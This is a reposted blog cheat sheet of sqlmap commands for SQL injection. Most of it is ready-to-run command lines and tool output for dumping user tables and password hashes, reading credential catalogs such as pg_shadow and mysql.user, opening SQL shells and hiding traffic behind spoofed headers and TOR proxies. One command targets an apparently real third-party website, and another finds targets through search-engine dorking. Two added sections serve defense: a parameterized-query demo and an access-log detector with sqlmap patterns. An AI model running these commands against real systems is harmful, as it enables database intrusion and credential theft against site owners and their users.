Commonly used injection commands

$ python sqlmap.py -u "http://ww.victim.com/get_int.php?id=1" --union-use --dump -T users -D public -v 0
[snip]
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
Database: public
Table: users
[4 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | blissett   | luther   |
| 2  | nameisnull | NULL     |
| 3  | bunny      | fluffy   |
| 4  | ming       | wu       |
+----+------------+----------+
 17 
 18 =======================================
 19 
This list was compiled by mickey; not much to add. Out of respect for the original author, just credit "compiled by mickey" when reposting.

Update
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell //run SQL statements

sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5 //more detailed output

load options from a configuration INI file
sqlmap -c sqlmap.conf

Submit with the POST method
sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST --data "id=1"

Submit via cookies; cookie values are separated with ';'. TamperData can be used to capture the cookies
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1

Spoof the referer
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --referer "http://www.google.com" -v 3

Use a custom user-agent, or a random one from the bundled user-agents.txt
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -a "./txt/user-agents.txt"

Use Basic authentication
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3

Use Digest authentication
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3

Use a proxy, for example together with TOR
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:3128"
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:8118"

Multi-threaded guessing
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3

Skip the dynamic-parameter check by naming the injectable parameter directly; several parameters can be separated with ','; the user-agent can also be named as the injection point
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id"
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
 64 
Specify the DBMS, bypassing sqlmap's automatic detection
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"

* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

Specify the operating system, bypassing sqlmap's automatic detection
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"

* Linux
* Windows

Custom payload
Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. These options also come in handy when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";:

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 -p "id" --prefix "'" --postfix "AND 'test'='test"

[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]

As you can see, the injection payload used for the custom injection test is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL-decoded is:

id=1') AND 7433=7433 AND ('test'='test

and keeps the page's query syntactically correct:

SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example sqlmap could have detected and exploited the SQL injection without a custom injection payload, but in real-world applications it is sometimes necessary to provide one.
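The following is an added example, not code from the original post or from sqlmap, that shows from the defender's side why the custom payload above works and what stops it. It builds an in-memory SQLite table shaped like the users table at the top of this page (the rows are constructed), runs a lookup that splices the id parameter into the SQL text exactly as the PHP query above does, and compares it with a lookup that passes the id as a bound parameter. The sqlite3 module and the SQLite dialect are assumptions; the page's target is MySQL, but the id=('...') and LIMIT 0, 1 syntax behave the same for this purpose.

```python
import sqlite3

# Constructed sample data shaped like the page's `users` table (id, password, username).
ROWS = [
    (1, "blissett", "luther"),
    (2, "nameisnull", None),
    (3, "bunny", "fluffy"),
    (4, "ming", "wu"),
]

# The request shown on the page, URL-decoded: a quote and parenthesis to close the
# original expression, a boolean test, and a postfix that reopens it.
TRUE_PAYLOAD = "1') AND 7433=7433 AND ('test'='test"
# The same value with the comparison made false; the differing response is the
# boolean signal that inference-based injection relies on.
FALSE_PAYLOAD = "1') AND 7433=7434 AND ('test'='test"


def make_db():
    """Create an in-memory database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, password TEXT, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, user_id):
    """Mirror of the page's PHP: the parameter is concatenated into the SQL text,
    so its quotes and parentheses are parsed as SQL syntax."""
    query = "SELECT * FROM users WHERE id=('" + user_id + "') LIMIT 0, 1"
    return conn.execute(query).fetchall()


def parameterized_lookup(conn, user_id):
    """Hardened form: the value travels to the engine separately from the statement,
    so the whole string is compared against id as one literal and never parsed."""
    return conn.execute("SELECT * FROM users WHERE id=(?) LIMIT 0, 1", (user_id,)).fetchall()


def boolean_oracle_visible(lookup):
    """True if the lookup answers differently for the true and false payloads,
    i.e. if it leaks a boolean that an injection tool can drive bit by bit."""
    conn = make_db()
    return lookup(conn, TRUE_PAYLOAD) != lookup(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    conn = make_db()
    print("concatenated, true payload :", vulnerable_lookup(conn, TRUE_PAYLOAD))
    print("concatenated, false payload:", vulnerable_lookup(conn, FALSE_PAYLOAD))
    print("parameterized, true payload:", parameterized_lookup(conn, TRUE_PAYLOAD))
    print("oracle visible (concatenated) :", boolean_oracle_visible(vulnerable_lookup))
    print("oracle visible (parameterized):", boolean_oracle_visible(parameterized_lookup))
```

The concatenated lookup returns the id=1 row for the true payload and nothing for the false one, which is exactly the difference sqlmap's --string/--regexp comparison measures. The parameterized lookup returns nothing for either, because the engine compares the integer column with the whole string as a literal; there is no boolean to observe, so the prefix/postfix trick has nothing to work with.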
118 
Page comparison
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "<td>lu[\w][\w]er" -v

Exclude page content from the comparison
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

Stacked-queries test; PHP's built-in mysql_query() does not support multiple statements
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

UNION injection test
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

UNION injection with the ORDER BY technique
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1

python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

fingerprint
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f
python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b

Check whether the current user is a DBA
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1

Enumerate database users
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --users -v 0

Enumerate database user passwords
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --passwords -U sa -v 0

View user privileges
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --privileges -U postgres -v 0

List databases
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dbs -v 0

List the columns of a given table in a given database
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns -T users -D test -v 1

Dump the contents of a given column of a given table in a given database
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump -T users -D master -C surname -v 0

Limit the range of dumped entries to 2-4
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump -T users -D test --start 2 --stop 4 -v 0

Dump all databases and the contents of all tables
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0

Dump only user-created databases and tables
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump-all --exclude-sysdbs -v 0

sql query
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query "SELECT usename FROM pg_user" -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

Save and resume a session
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 -s "sqlmap.log"

Save the options to an INI configuration file
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 --save
186 
187  
188 
189 =====================================================
190 
191 
192 
2. sqlmap -g "keyword" //injection through Google search; this does not work at the moment, not sure why; it can be changed to Baidu directly
3.
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1


[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[hh:mm:26] [INFO] query: CONCAT('5', '5')
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[hh:mm:26] [INFO] query: LENGTH('5')
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0


4. Inject into a specified parameter

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "id"

[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing sql injection on parameter 'id'
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]

Or if you want to provide more than one parameter, for instance:

$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "cat,id"

5. Specify the method and the POST data
python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --data "id=1&cat=2"

6. Specify a cookie; this allows injecting into pages that require login
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie "COOKIE_VALUE"

7. Inject through a proxy
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118"
8. Specify a keyword (optional); otherwise the program decides automatically from the hash of the response
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE"
9. Specify the DBMS, so it does not have to guess among the other databases; this improves efficiency.
--remote-dbms
10. Fingerprint the database type
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f
11. Get the banner
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b


banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
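As a defender-side companion to the commands on this page, here is an added example (not from the original post or from sqlmap) that scans web-server access-log lines for the traces this usage leaves: the sqlmap User-Agent string seen in the custom-injection request above, URL-encoded boolean tests of the form AND n=n, the CONCAT()/LENGTH() fingerprinting probes shown in the log above, and reads of catalog tables such as information_schema, pg_shadow and mysql.user. The log lines are constructed for this example in Apache combined format (the first reproduces the page's own request); the indicator regexes are this example's own and deliberately narrow.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access-log lines. The first reproduces the request
# sqlmap sent in the custom-injection example on this page; the third is a probe that
# hides behind a browser user-agent; the others are benign traffic.
SAMPLE_LOG = """\
192.168.1.47 - - [23/Apr/2013:10:01:16 +0800] "GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1" 200 512 "-" "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
192.168.1.50 - - [23/Apr/2013:10:01:20 +0800] "GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1" 200 480 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.47 - - [23/Apr/2013:10:01:26 +0800] "GET /page.php?id=1%20AND%20LENGTH%28%275%27%29%3D1&cat=2 HTTP/1.1" 200 480 "http://www.google.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
192.168.1.51 - - [23/Apr/2013:10:02:00 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1)"
"""

# Apache "combined" format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators drawn from the commands and traffic on this page, applied to the
# URL-decoded request line. Each is (name, compiled regex).
INDICATORS = [
    # boolean test of the form "AND 7433=7433" (same number on both sides)
    ("tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    # DBMS fingerprinting functions seen in the inference log above
    ("dbms-probe", re.compile(r"\b(CONCAT|LENGTH)\s*\(", re.I)),
    # catalog tables that the --sql-query and --dbs commands read
    ("catalog-read", re.compile(r"\b(information_schema|pg_shadow|pg_user|mysql\.user)\b", re.I)),
]
# The tool's default User-Agent, unless the operator overrides it with --user-agent or -a
UA_RE = re.compile(r"sqlmap", re.I)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_path"] = unquote(rec["path"])  # %27 -> ', %28 -> (, %20 -> space
    return rec


def classify(rec):
    """Return the list of indicator names that fire on a parsed record."""
    hits = []
    if UA_RE.search(rec["ua"]):
        hits.append("sqlmap-ua")
    for name, rx in INDICATORS:
        if rx.search(rec["decoded_path"]):
            hits.append(name)
    return hits


def scan(log_text):
    """Return [(client ip, decoded request path, hits)] for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            findings.append((rec["ip"], rec["decoded_path"], hits))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(f"{ip}  {hits}  {path}")
```

Decoding before matching matters: the boolean test in the first line is invisible in the raw %27%29%20AND%207433=7433 form, and the third line shows why the User-Agent alone is a weak signal, since this page documents swapping it for a browser string. Matching on the request rather than the response also means the check works on ordinary access logs without any application changes.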

 

Reposted from: https://www.cnblogs.com/crackkay/archive/2013/04/23/3038822.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值